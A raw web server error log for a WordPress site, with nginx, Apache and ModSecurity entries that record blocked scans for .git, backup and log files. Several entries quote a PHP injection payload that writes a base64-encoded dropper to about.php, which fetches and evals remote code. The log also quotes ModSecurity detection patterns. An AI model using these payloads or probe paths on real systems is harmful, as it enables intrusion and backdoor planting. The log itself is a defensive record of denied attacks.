2025/03/11 01:52:06 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/description HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:08 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:09 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:16 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:17 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:17 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:18 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:18 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:19 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:20 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:20 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:21 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:22 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:32 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:33 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:37 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Mar 11 03:23:23.643445 2025] [ssl:warn] [pid 19055:tid 140304692406144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 11 03:23:23.907609 2025] [ssl:warn] [pid 19056:tid 140304692406144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 11 03:23:24.512247 2025] [ssl:warn] [pid 19056:tid 140304692406144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 11 03:23:28.675872 2025] [ssl:warn] [pid 19056:tid 140304692406144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 11 03:23:31.006254 2025] [ssl:warn] [pid 19495:tid 139671691814784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 11 03:23:31.236786 2025] [ssl:warn] [pid 19496:tid 139671691814784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 11 08:57:57.699027 2025] [:error] [pid 20127:tid 139671279441664] [client 18.130.233.10:38004] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9BBZdp5n4Xh6hrnRnJHaAAAANM"], referer: http://investigacionperu.com [Tue Mar 11 08:57:59.802068 2025] [:error] [pid 19514:tid 139671371761408] [client 18.130.233.10:38012] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9BBZ07GSN4j22AyRlR3mQAAAEg"], referer: http://investigacionperu.com [Tue Mar 11 08:58:01.136465 2025] [:error] [pid 20127:tid 139671296227072] [client 18.130.233.10:38016] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9BBadp5n4Xh6hrnRnJHaQAAANE"], referer: http://investigacionperu.com [Tue Mar 11 08:58:02.631549 2025] [:error] [pid 20127:tid 139671304619776] [client 18.130.233.10:38020] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9BBatp5n4Xh6hrnRnJHagAAANA"], referer: http://investigacionperu.com [Tue Mar 11 08:58:04.066855 2025] [:error] [pid 20127:tid 139671329797888] [client 18.130.233.10:38030] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9BBbNp5n4Xh6hrnRnJHawAAAM0"], referer: http://investigacionperu.com [Tue Mar 11 08:58:05.451872 2025] [:error] [pid 19514:tid 139671388546816] [client 18.130.233.10:38038] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9BBbU7GSN4j22AyRlR3nQAAAEY"], referer: http://investigacionperu.com [Tue Mar 11 08:58:06.795153 2025] [:error] [pid 19514:tid 139671313012480] [client 18.130.233.10:38042] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z9BBbk7GSN4j22AyRlR3ngAAAE8"], referer: http://investigacionperu.com [Tue Mar 11 08:58:07.996400 2025] [:error] [pid 20127:tid 139671271048960] [client 18.130.233.10:38046] [client 18.130.233.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z9BBb9p5n4Xh6hrnRnJHbQAAANQ"], referer: http://investigacionperu.com 2025/03/11 10:04:02 [error] 19478#19478: *230788 access forbidden by rule, client: 159.223.97.207, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/11 10:04:02 [error] 19478#19478: *230788 access forbidden by rule, client: 159.223.97.207, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:12 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:14 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:16 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:18 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:21 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:22 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:24 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/description HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:26 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:27 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:29 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:30 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:32 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:34 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:35 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:37 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:38 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:40 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:42 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:43 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:45 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:47 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "investigacionperu.com" 2025/03/11 12:38:48 [error] 19478#19478: *232547 access forbidden by rule, client: 193.41.206.138, server: investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "investigacionperu.com" [Tue Mar 11 12:42:31.283426 2025] [:error] [pid 20127:tid 139671237478144] [client 193.41.206.138:43372] [client 193.41.206.138] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z9B2B9p5n4Xh6hrnRnJJJAAAANg"] [Tue Mar 11 12:46:16.315778 2025] [:error] [pid 19513:tid 139671262656256] [client 193.41.206.138:43594] [client 193.41.206.138] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z9B26El-J-Mmp-s_MhbBSAAAABU"] [Tue Mar 11 15:57:23.092952 2025] [autoindex:error] [pid 19514:tid 139671321405184] [client 64.227.143.222:47560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 11 22:44:58.023590 2025] [autoindex:error] [pid 20127:tid 139671363368704] [client 172.86.72.149:55512] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:45:15.566611 2025] [autoindex:error] [pid 19513:tid 139671363368704] [client 172.86.72.149:55516] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:45:22.812615 2025] [autoindex:error] [pid 19515:tid 139671313012480] [client 172.86.72.149:55520] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:45:30.243459 2025] [autoindex:error] [pid 19515:tid 139671380154112] [client 172.86.72.149:55526] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:45:39.485609 2025] [autoindex:error] [pid 20127:tid 139671237478144] [client 172.86.72.149:55536] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:45:45.400660 2025] [autoindex:error] [pid 19514:tid 139671346583296] [client 172.86.72.149:55546] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:46:08.376200 2025] [autoindex:error] [pid 20127:tid 139671254263552] [client 172.86.72.149:55574] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 11 22:46:15.181476 2025] [autoindex:error] [pid 19515:tid 139671262656256] [client 